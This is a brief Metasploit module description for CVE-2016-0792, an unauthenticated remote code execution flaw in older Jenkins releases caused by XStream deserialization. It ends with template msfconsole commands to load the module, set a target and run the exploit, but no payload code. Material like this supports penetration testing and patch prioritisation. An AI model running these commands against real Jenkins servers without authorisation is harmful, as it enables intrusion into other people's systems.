This module exploits CVE-2016-0792 a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions
older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath,
which allows remote arbitrary code execution. The issue affects default installations. Authentication
is not required to exploit the vulnerability.
msf > use exploit/multi/http/jenkins_xstream_deserialize
msf exploit(jenkins_xstream_deserialize) > show targets
...targets...
msf exploit(jenkins_xstream_deserialize) > set TARGET < target-id >
msf exploit(jenkins_xstream_deserialize) > show options
...show and set options...
msf exploit(jenkins_xstream_deserialize) > exploit